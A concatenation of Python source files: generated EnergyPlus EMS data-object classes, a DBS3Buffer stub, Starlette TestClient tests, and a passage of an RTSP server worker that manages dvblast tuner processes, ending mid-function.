self["End-Use Category"] = value
@property
def enduse_subcategory(self):
"""field `End-Use Subcategory`
| enter a user-defined subcategory for this metered output
Args:
value (str): value for IDD Field `End-Use Subcategory`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `enduse_subcategory` or None if not set
"""
return self["End-Use Subcategory"]
@enduse_subcategory.setter
def enduse_subcategory(self, value=None):
""" Corresponds to IDD field `End-Use Subcategory`
"""
self["End-Use Subcategory"] = value
@property
def units(self):
"""field `Units`
| optional but will result in dimensionless units for blank
| EnergyPlus units are standard SI units
Args:
value (str): value for IDD Field `Units`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `units` or None if not set
"""
return self["Units"]
@units.setter
def units(self, value=None):
"""Corresponds to IDD field `Units`"""
self["Units"] = value
class EnergyManagementSystemTrendVariable(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:TrendVariable`
This object sets up an EMS trend variable from an Erl variable
A trend variable logs values across timesteps
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'ems variable name',
{'name': u'EMS Variable Name',
'pyname': u'ems_variable_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'number of timesteps to be logged',
{'name': u'Number of Timesteps to be Logged',
'pyname': u'number_of_timesteps_to_be_logged',
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 3,
'name': u'EnergyManagementSystem:TrendVariable',
'pyname': u'EnergyManagementSystemTrendVariable',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| no spaces allowed in name
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def ems_variable_name(self):
"""field `EMS Variable Name`
| must be a global scope EMS variable
Args:
value (str): value for IDD Field `EMS Variable Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `ems_variable_name` or None if not set
"""
return self["EMS Variable Name"]
@ems_variable_name.setter
def ems_variable_name(self, value=None):
"""Corresponds to IDD field `EMS Variable Name`"""
self["EMS Variable Name"] = value
@property
def number_of_timesteps_to_be_logged(self):
"""field `Number of Timesteps to be Logged`
| value >= 1
Args:
value (int): value for IDD Field `Number of Timesteps to be Logged`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `number_of_timesteps_to_be_logged` or None if not set
"""
return self["Number of Timesteps to be Logged"]
@number_of_timesteps_to_be_logged.setter
def number_of_timesteps_to_be_logged(self, value=None):
"""Corresponds to IDD field `Number of Timesteps to be Logged`"""
self["Number of Timesteps to be Logged"] = value
class EnergyManagementSystemInternalVariable(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:InternalVariable`
Declares EMS variable as an internal data variable
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'internal data index key name',
{'name': u'Internal Data Index Key Name',
'pyname': u'internal_data_index_key_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'internal data type',
{'name': u'Internal Data Type',
'pyname': u'internal_data_type',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 3,
'name': u'EnergyManagementSystem:InternalVariable',
'pyname': u'EnergyManagementSystemInternalVariable',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| This name becomes a variable for use in Erl programs
| no spaces allowed in name
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def internal_data_index_key_name(self):
"""field `Internal Data Index Key Name`
Args:
value (str): value for IDD Field `Internal Data Index Key Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `internal_data_index_key_name` or None if not set
"""
return self["Internal Data Index Key Name"]
@internal_data_index_key_name.setter
def internal_data_index_key_name(self, value=None):
"""Corresponds to IDD field `Internal Data Index Key Name`"""
self["Internal Data Index Key Name"] = value
@property
def internal_data_type(self):
"""field `Internal Data Type`
Args:
value (str): value for IDD Field `Internal Data Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `internal_data_type` or None if not set
"""
return self["Internal Data Type"]
@internal_data_type.setter
def internal_data_type(self, value=None):
"""Corresponds to IDD field `Internal Data Type`"""
self["Internal Data Type"] = value
class EnergyManagementSystemCurveOrTableIndexVariable(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:CurveOrTableIndexVariable`
Declares EMS variable that identifies a curve or table
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'curve or table object name',
{'name': u'Curve or Table Object Name',
'pyname': u'curve_or_table_object_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 2,
'name': u'EnergyManagementSystem:CurveOrTableIndexVariable',
'pyname': u'EnergyManagementSystemCurveOrTableIndexVariable',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| This name becomes a variable for use in Erl programs
| no spaces allowed in name
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def curve_or_table_object_name(self):
"""field `Curve or Table Object Name`
Args:
value (str): value for IDD Field `Curve or Table Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `curve_or_table_object_name` or None if not set
"""
return self["Curve or Table Object Name"]
@curve_or_table_object_name.setter
def curve_or_table_object_name(self, value=None):
"""Corresponds to IDD field `Curve or Table Object Name`"""
self["Curve or Table Object Name"] = value
class EnergyManagementSystemConstructionIndexVariable(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:ConstructionIndexVariable`
Declares EMS variable that identifies a construction
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'construction object name',
{'name': u'Construction Object Name',
'pyname': u'construction_object_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 2,
'name': u'EnergyManagementSystem:ConstructionIndexVariable',
'pyname': u'EnergyManagementSystemConstructionIndexVariable',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| This name becomes a variable for use in Erl programs
| no spaces allowed in name
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def construction_object_name(self):
"""field `Construction Object Name`
Args:
value (str): value for IDD Field `Construction Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `construction_object_name` or None if not set
"""
return self["Construction Object Name"]
@construction_object_name.setter
def construction_object_name(self, value=None):
"""Corresponds to IDD field `Construction Object Name`"""
self["Construction Object Name"] = value
class EnergyManagementSystemProgram(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:Program`
This input defines an Erl program
Each field after the name is a line of EMS Runtime Language
"""
_schema = {'extensible-fields': OrderedDict([(u'program line 1',
{'name': u'Program Line 1',
'pyname': u'program_line_1',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 2,
'name': u'EnergyManagementSystem:Program',
'pyname': u'EnergyManagementSystemProgram',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| no spaces allowed in name
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
def add_extensible(self,
program_line_1=None,
):
"""Add values for extensible fields.
Args:
program_line_1 (str): value for IDD Field `Program Line 1`
if `value` is None it will not be checked against the
specification and is assumed to be a missing value
"""
vals = []
program_line_1 = self.check_value("Program Line 1", program_line_1)
vals.append(program_line_1)
self._extdata.append(vals)
@property
def extensibles(self):
"""Get list of all extensibles."""
return self._extdata
@extensibles.setter
def extensibles(self, extensibles):
"""Replaces extensible fields with `extensibles`
Args:
extensibles (list): nested list of extensible values
"""
self._extdata = []
for ext in extensibles:
self.add_extensible(*ext)
class EnergyManagementSystemSubroutine(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:Subroutine`
This input defines an Erl program subroutine
Each field after the name is a line of EMS Runtime Language
"""
_schema = {'extensible-fields': OrderedDict([(u'program line',
{'name': u'Program Line',
'pyname': u'program_line',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 2,
'name': u'EnergyManagementSystem:Subroutine',
'pyname': u'EnergyManagementSystemSubroutine',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| no spaces allowed in name
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
def add_extensible(self,
program_line=None,
):
"""Add values for extensible fields.
Args:
program_line (str): value for IDD Field `Program Line`
if `value` is None it will not be checked against the
specification and is assumed to be a missing value
"""
vals = []
program_line = self.check_value("Program Line", program_line)
vals.append(program_line)
self._extdata.append(vals)
@property
def extensibles(self):
"""Get list of all extensibles."""
return self._extdata
@extensibles.setter
def extensibles(self, extensibles):
"""Replaces extensible fields with `extensibles`
Args:
extensibles (list): nested list of extensible values
"""
self._extdata = []
for ext in extensibles:
self.add_extensible(*ext)
class EnergyManagementSystemGlobalVariable(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:GlobalVariable`
Declares Erl variable as having global scope
No spaces allowed in names used for Erl variables
"""
_schema = {'extensible-fields': OrderedDict([(u'erl variable 1 name',
{'name': u'Erl Variable 1 Name',
'pyname': u'erl_variable_1_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'fields': OrderedDict(),
'format': None,
'group': u'Energy Management System',
'min-fields': 1,
'name': u'EnergyManagementSystem:GlobalVariable',
'pyname': u'EnergyManagementSystemGlobalVariable',
'required-object': False,
'unique-object': False}
def add_extensible(self,
erl_variable_1_name=None,
):
"""Add values for extensible fields.
Args:
erl_variable_1_name (str): value for IDD Field `Erl Variable 1 Name`
if `value` is None it will not be checked against the
specification and is assumed to be a missing value
"""
vals = []
erl_variable_1_name = self.check_value(
"Erl Variable 1 Name",
erl_variable_1_name)
vals.append(erl_variable_1_name)
self._extdata.append(vals)
@property
def extensibles(self):
"""Get list of all extensibles."""
return self._extdata
@extensibles.setter
def extensibles(self, extensibles):
"""Replaces extensible fields with `extensibles`
Args:
extensibles (list): nested list of extensible values
"""
self._extdata = []
for ext in extensibles:
self.add_extensible(*ext)
| StarcoderdataPython |
3281238 | #!/usr/bin/env python
"""
_SetBlockFiles_
Oracle implementation of DBS3Buffer.SetBlockFiles
"""
from WMComponent.DBS3Buffer.MySQL.SetBlockFiles import SetBlockFiles as MySQLSetBlockFiles
class SetBlockFiles(MySQLSetBlockFiles):
pass
| StarcoderdataPython |
1737816 | import anyio
import pytest
from starlette.applications import Starlette
from starlette.middleware import Middleware
from starlette.responses import JSONResponse
from starlette.testclient import TestClient
from starlette.websockets import WebSocket, WebSocketDisconnect
mock_service = Starlette()
@mock_service.route("/")
def mock_service_endpoint(request):
return JSONResponse({"mock": "example"})
app = Starlette()
@app.route("/")
def homepage(request):
client = TestClient(mock_service)
response = client.get("/")
return JSONResponse(response.json())
startup_error_app = Starlette()
@startup_error_app.on_event("startup")
def startup():
raise RuntimeError()
def test_use_testclient_in_endpoint():
"""
We should be able to use the test client within applications.
This is useful if we need to mock out other services,
during tests or in development.
"""
client = TestClient(app)
response = client.get("/")
assert response.json() == {"mock": "example"}
def test_use_testclient_as_contextmanager():
with TestClient(app):
pass
def test_error_on_startup():
with pytest.raises(RuntimeError):
with TestClient(startup_error_app):
pass # pragma: no cover
def test_exception_in_middleware():
class MiddlewareException(Exception):
pass
class BrokenMiddleware:
def __init__(self, app):
self.app = app
async def __call__(self, scope, receive, send):
raise MiddlewareException()
broken_middleware = Starlette(middleware=[Middleware(BrokenMiddleware)])
with pytest.raises(MiddlewareException):
with TestClient(broken_middleware):
pass # pragma: no cover
def test_testclient_asgi2():
def app(scope):
async def inner(receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
return inner
client = TestClient(app)
response = client.get("/")
assert response.text == "Hello, world!"
def test_testclient_asgi3():
async def app(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
client = TestClient(app)
response = client.get("/")
assert response.text == "Hello, world!"
def test_websocket_blocking_receive():
def app(scope):
async def respond(websocket):
await websocket.send_json({"message": "test"})
async def asgi(receive, send):
websocket = WebSocket(scope, receive=receive, send=send)
await websocket.accept()
async with anyio.create_task_group() as task_group:
task_group.start_soon(respond, websocket)
try:
# this will block as the client does not send us data
# it should not prevent `respond` from executing though
await websocket.receive_json()
except WebSocketDisconnect:
pass
return asgi
client = TestClient(app)
with client.websocket_connect("/") as websocket:
data = websocket.receive_json()
assert data == {"message": "test"}
| StarcoderdataPython |
1736971 | #!/usr/bin/python
import sys, traceback, threading, socket, signal, re, commands, os, time, string, random, uuid
from random import randint
from resources import getFrontEnds
from netInterfaceStatus import getServerIP
from scanning import getChList
from subprocess import Popen, PIPE
# global session
# global dvblastReload
global clientsDict
global chList
global frontEndsDict
global freqDict
global firstBootFlag
global fLog
# Init global variables
clientsDict = {} # e.g. clientsDict = { 'ip_client_1': {'rtpPort': '', state: 0, 'satFreq': '', stream: 0, 'src': '', 'pol': '', 'ro': '', 'msys': '', 'mtype': '', 'plts': '', 'sr': '', 'fec': '', 'status': 'sendonly', 'owner': True, 'session': '' }}
freqDict = {} # e.g. freqDict = {'freq': 'adapter0'}
frontEndsDict = {} # e.g. frontEndsDict = {'adapter0': {'owner': '0.0.0.0', 'freq': '', 'numOwners': 0}}
chList = {} # e.g. chList = {'satFreq': ['freq', 'pid']}
# session = '' # For THEARDOWN reply
# dvblastReload = False # e.g. Flag to trigger a reload
firstBootFlag = True # First bootup of the device
# Get chList, done only at the begining
chList = getChList()
# Make sure that rtspServerWorker.log file is clean
f = open('logs/rtspServerWorker.log', 'w')
f.close()
class rtspServerWorker:
# Events
SETUP = 'SETUP'
PLAY = 'PLAY'
TEARDOWN = 'TEARDOWN'
OPTIONS = 'OPTIONS'
DESCRIBE = 'DESCRIBE'
CLOSE_CONNETION = 'CLOSE_CONNETION'
# State
INI = 0
READY = 1
PLAYING = 2
OK_200_OPTIONS = 0
FILE_NOT_FOUND_404 = 1
CON_ERR_500 = 2
CLOSING_CONNECTION = 3
OK_404_DESCRIBE = 4
OK_200_DESCRIBE = 5
OK_200_DESCRIBE_NOSIGNAL = 6
OK_200_SETUP = 7
OK_200_SETUP_PIDS = 8
OK_200_PLAY = 9
OK_200_TEARDOWN = 10
SERVER_RUNNING = 1
clientInfo = {}
def __init__(self, clientInfo):
global clientsDict
rtpPort = ''
state = 0
stream = 0
src = ''
freq = ''
pol = ''
ro = ''
msys = ''
mtype = ''
plts = ''
sr = ''
fec = ''
status = 'inactive'
ownerCapabilties = True # Owner capabilties flag, in order to know if we can increase the number of owners of a tuner or not. If false that means that we are coowners, otherwise we are the only owner of a tuner or did not requested any at all.
session = ''
dvblastReload = False # DvblastReload flag, in order to know if we need to reload
self.clientInfo = clientInfo
if self.clientInfo['addr_IP'] not in clientsDict:
clientsDict[self.clientInfo['addr_IP']] = {}
clientsDict[self.clientInfo['addr_IP']]['rtpPort'] = rtpPort
clientsDict[self.clientInfo['addr_IP']]['state'] = state
clientsDict[self.clientInfo['addr_IP']]['stream'] = stream
clientsDict[self.clientInfo['addr_IP']]['src'] = src
clientsDict[self.clientInfo['addr_IP']]['freq'] = freq
clientsDict[self.clientInfo['addr_IP']]['pol'] = pol
clientsDict[self.clientInfo['addr_IP']]['ro'] = ro
clientsDict[self.clientInfo['addr_IP']]['msys'] = msys
clientsDict[self.clientInfo['addr_IP']]['mtype'] = mtype
clientsDict[self.clientInfo['addr_IP']]['plts'] = plts
clientsDict[self.clientInfo['addr_IP']]['sr'] = sr
clientsDict[self.clientInfo['addr_IP']]['fec'] = fec
clientsDict[self.clientInfo['addr_IP']]['status'] = status
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = ownerCapabilties
clientsDict[self.clientInfo['addr_IP']]['session'] = session
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = dvblastReload
def run(self):
global chList
chList = getChList()
t = threading.Thread(target=self.recvRtspRequest)
t.daemon = True
t.start()
try:
while t.is_alive():
t.join(timeout=1.0)
except (KeyboardInterrupt, SystemExit):
# fLog.close()
self.SERVER_RUNNING = 0
def recvRtspRequest(self):
"""Receive RTSP request from the client."""
connSocket = self.clientInfo['rtspSocket']
while self.SERVER_RUNNING:
data = connSocket.recv(1024)
if data:
self.processRtspRequest(data)
def processRtspRequest(self, data):
"""Process RTSP request sent from the client."""
# global session
# global dvblastReload
global chList
global clientsDict
global frontEndsDict
global freqDict
global firstBootFlag
global fLog
# Initialize local variables
freq = ''
pids = ''
delPids = 0
delPid = 0
fLog = open('logs/rtspServerWorker.log', 'a')
# Get the request type
request = data.split('\n')
line1 = request[0].split(' ')
requestType = line1[0]
# Get the last part of the URI
uriLastPart = line1[1]
# Get the RTSP sequence number
for seq_find in request[1:]:
# Word parsing for general URI request seq/client_port
match_seq = re.search(r'CSeq', seq_find)
if match_seq:
# To do check the output
seq = seq_find.split(':')
match_client_port = re.search(r'client_port', seq_find)
if match_client_port:
seq_find_array = seq_find.split(';')
self.clientInfo['rtpPort']= seq_find_array[2].split('=')[1].split('-')[0]
clientsDict[self.clientInfo['addr_IP']]['rtpPort'] = self.clientInfo['rtpPort']
# Word parsing for SETUP/PLAY URI request
if requestType == self.SETUP or requestType == self.PLAY:
match_pids = re.search(r'pids=([\w]+)', uriLastPart)
if match_pids:
pids = match_pids.group(1)
match_delpids = re.search(r'delpids=([\w]+)', uriLastPart)
if match_delpids:
delPids = 1
delPid = int(match_delpids.group(1))
# Process SETUP request
if requestType == self.SETUP:
# Word parsing for SETUP URI request
match_src = re.search(r'src=([\w]+)', uriLastPart)
if match_src:
clientsDict[self.clientInfo['addr_IP']]['src'] = match_src.group(1)
match_freq = re.search(r'freq=([\w]+)', uriLastPart)
if match_freq:
freq = match_freq.group(1)
clientsDict[self.clientInfo['addr_IP']]['freq'] = freq
match_pol = re.search(r'pol=([\w]+)', uriLastPart)
if match_pol:
clientsDict[self.clientInfo['addr_IP']]['pol'] = match_pol.group(1)
match_ro = re.search(r'ro=([\w]+...)', uriLastPart)
if match_ro:
clientsDict[self.clientInfo['addr_IP']]['ro'] = match_ro.group(1)
match_msys = re.search(r'msys=([\w]+)', uriLastPart)
if match_msys:
clientsDict[self.clientInfo['addr_IP']]['msys'] = match_msys.group(1)
match_mtype = re.search(r'mtype=([\w]+)', uriLastPart)
if match_mtype:
clientsDict[self.clientInfo['addr_IP']]['mtype'] = match_mtype.group(1)
match_plts = re.search(r'plts=([\w]+)', uriLastPart)
if match_plts:
clientsDict[self.clientInfo['addr_IP']]['plts'] = match_plts.group(1)
match_sr = re.search(r'sr=([\w]+)', uriLastPart)
if match_sr:
clientsDict[self.clientInfo['addr_IP']]['sr'] = match_sr.group(1)
match_fec = re.search(r'fec=([\w]+)', uriLastPart)
if match_fec:
clientsDict[self.clientInfo['addr_IP']]['fec'] = match_fec.group(1)
clientsDict[self.clientInfo['addr_IP']]['status'] = 'sendonly'
# Process SETUP request If STATE is INI
if clientsDict[self.clientInfo['addr_IP']]['state'] == self.INI:
fLog.write("Info rtspServerWorker: Processing SETUP, New State: READY\n")
clientsDict[self.clientInfo['addr_IP']]['state'] = self.READY
# Generate a randomized RTSP session ID
clientsDict[self.clientInfo['addr_IP']]['session'] = uuid.uuid4().hex[:16]
# Increment streamID for every new session
clientsDict[self.clientInfo['addr_IP']]['stream'] = (clientsDict[self.clientInfo['addr_IP']]['stream'] + 1) % 65536
# Send RTSP reply
if freq in chList:
f = open('dvb-t/pid' + chList[freq][0] + '.cfg', 'a')
f.write(self.clientInfo['addr_IP'] + ':' + clientsDict[self.clientInfo['addr_IP']]['rtpPort'] + '\t1\t' + chList[freq][1] + '\n')
f.close()
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = True
if pids == 'none' or pids == '':
self.replyRtsp(self.OK_200_SETUP, seq[1])
if pids == 'none':
clientsDict[self.clientInfo['addr_IP']]['status'] = 'inactive'
else:
self.replyRtsp(self.OK_200_SETUP_PIDS, seq[1])
# Process SETUP request If STATE is READY
elif clientsDict[self.clientInfo['addr_IP']]['state'] == self.READY:
fLog.write("Info rtspServerWorker: Processing SETUP, State: READY\n")
# Send RTSP reply
self.replyRtsp(self.OK_200_SETUP, seq[1])
# Process SETUP request If STATE is PLAYING
elif clientsDict[self.clientInfo['addr_IP']]['state'] == self.PLAYING:
fLog.write("Info rtspServerWorker: Processing SETUP, State: PLAYING\n")
if freq in chList:
f = open('dvb-t/pid' + chList[freq][0] + '.cfg', 'r')
lines = f.readlines()
f.close()
f = open('dvb-t/pid' + chList[freq][0] + '.cfg', 'w')
lineToCompare = self.clientInfo['addr_IP']
for line in lines:
match_line = re.search(lineToCompare, line)
if not match_line:
f.write(line)
f.write(self.clientInfo['addr_IP'] + ':' + clientsDict[self.clientInfo['addr_IP']]['rtpPort'] + '\t1\t' + chList[freq][1] + '\n')
f.close()
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = True
self.replyRtsp(self.OK_200_SETUP, seq[1])
# Process PLAY request
elif requestType == self.PLAY:
# Get available frontends
frontEndsDict = getFrontEnds(frontEndsDict)
if clientsDict[self.clientInfo['addr_IP']]['state'] == self.PLAYING or clientsDict[self.clientInfo['addr_IP']]['state'] == self.READY:
# Send response after processing and starting dvblast
if clientsDict[self.clientInfo['addr_IP']]['state'] == self.READY:
fLog.write("Info rtspServerWorker: Processing PLAY, New State: PLAYING\n")
clientsDict[self.clientInfo['addr_IP']]['state'] = self.PLAYING
else:
# print "Info rtspServerWorker: Processing PLAY, State: PLAYING\n"
fLog.write("Info rtspServerWorker: Processing PLAY, State: PLAYING\n")
self.replyRtsp(self.OK_200_PLAY, seq[1])
# START/RELOAD configuration for dvblast only if we have a streamID, the configuration file has been update and the PLAY URI is not a delete pid
if clientsDict[self.clientInfo['addr_IP']]['stream'] and clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] and delPids == 0:
# If firstBootFlag is true this means that no frontend has been configured, so stop wasting time with searching for particular frontends
if firstBootFlag:
firstBootFlag = False
for frontEnd in frontEndsDict:
if frontEndsDict[frontEnd]['freq'] == '':
# Start dvblast on specified freq
cmd = 'dvblast -a ' + frontEnd[-1] + ' -c dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg -f ' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + ' -b 8 -C -u -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + frontEnd + '.sock'
fLog.write('Info rtspServerWorker: Starting dvblast 1\n')
self.run_dvblast(cmd)
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = False
frontEndsDict[frontEnd]['freq'] = chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]
frontEndsDict[frontEnd]['owner'] = self.clientInfo['addr_IP']
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owners
freqDict[frontEndsDict[frontEnd]['freq']] = frontEnd
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = True
# print " frontEndsDict0", frontEndsDict
break
# No more first boot, the search for available and preconfigured/unconfigured frontends
else:
# print " frontEndsDict1", frontEndsDict
# print " clientsDict", clientsDict
# Search for any configured tuner with the frequency that we want to tune to
for frontEnd in frontEndsDict:
if frontEndsDict[frontEnd]['freq'] == chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]:
cmd = 'dvblastctl -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + frontEnd + '.sock reload'
fLog.write('Info rtspServerWorker: Reloading dvblast configuration 1\n')
self.run_dvblast(cmd)
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = False
# Check if this was an abandoned tuner ('0.0.0.0' abandonded IP address) and take ownership if it was
if frontEndsDict[frontEnd]['owner'] == '0.0.0.0':
frontEndsDict[frontEnd]['owner'] = self.clientInfo['addr_IP']
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owner
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = True
# print "Info Alex --------------- 1"
# Check if multiple owners ('255.255.255.255' broadcast IP address) and you have ownership capabilities,
# then increase the number of owners by one and remove your ownership capabilities.
if frontEndsDict[frontEnd]['owner'] == '255.255.255.255' and clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties']:
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owner
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = False # remove the ownership capability from the client
# print "Info Alex --------------- 2"
# Check if somebody else owne's it and you have ownership capabilities,
# then make the tuner for multiple owners, increase the number of owners and remove your ownership capabilities
elif frontEndsDict[frontEnd]['owner'] != self.clientInfo['addr_IP'] and clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties']:
clientsDict[frontEndsDict[frontEnd]['owner']]['owner'] = False # Remove the ownership capabilities of the previous owner
frontEndsDict[frontEnd]['owner'] = '255.255.255.255' # '255.255.255.255' the IP address for specifying multiple owners
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owner
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = False # Remove the ownership capabilties of yourself
# print "Info Alex --------------- 3"
# print " frontEndsDict2", frontEndsDict
break
# If we did not find any tuner that has that frequency configured,then search for any owned tuners
if clientsDict[self.clientInfo['addr_IP']]['dvblastReload']:
for frontEnd in frontEndsDict:
if frontEndsDict[frontEnd]['owner'] == self.clientInfo['addr_IP'] or frontEndsDict[frontEnd]['owner'] == '0.0.0.0':
# Shutdown socket if used
try:
cmd = 'dvblastctl -r /tmp/dvblast' + frontEndsDict[frontEnd]['freq'] + frontEnd + '.sock shutdown'
fLog.write("Info rtspServerWorker: Shutting down dvblast for this tuner\n")
self.run_dvblast(cmd)
# print 'ALEX --- 6'
# ALEX : ----- To be checked
time.sleep(1)
# Alex : -----
except:
print "Info rtspServerWorker: Tried to shut down tuner, however the tuner was not used"
# Cleaning dvblast sockets is any not removed, before creating any other
try:
cmdClean = 'rm -rf /tmp/dvblast' + frontEndsDict[frontEnd]['freq'] + frontEnd + '.sock'
fLog.write("Info rtspServerWorker: Cleaning dvblast sockets, before restarting\n")
os.system(cmdClean)
except:
fLog.write("Info rtspServerWorker: No Cleaning for dvblast sockets, before restarting\n")
# Start dvblast on specified freq
cmd = 'dvblast -a ' + frontEnd[-1] + ' -c dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg -f ' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + ' -b 8 -C -u -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + frontEnd + '.sock'
fLog.write('Info rtspServerWorker: Starting dvblast 2\n')
self.run_dvblast(cmd)
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = False
# Assume ownership
if frontEndsDict[frontEnd]['owner'] == '0.0.0.0':
frontEndsDict[frontEnd]['owner'] = self.clientInfo['addr_IP']
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owners
frontEndsDict[frontEnd]['freq'] = chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]
freqDict[frontEndsDict[frontEnd]['freq']] = frontEnd
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = True
# print " frontEndsDict3", frontEndsDict
break
# If we did not fine any owned tuners, then give it one more search before giving up. Search for nonused available tuners.
if clientsDict[self.clientInfo['addr_IP']]['dvblastReload']:
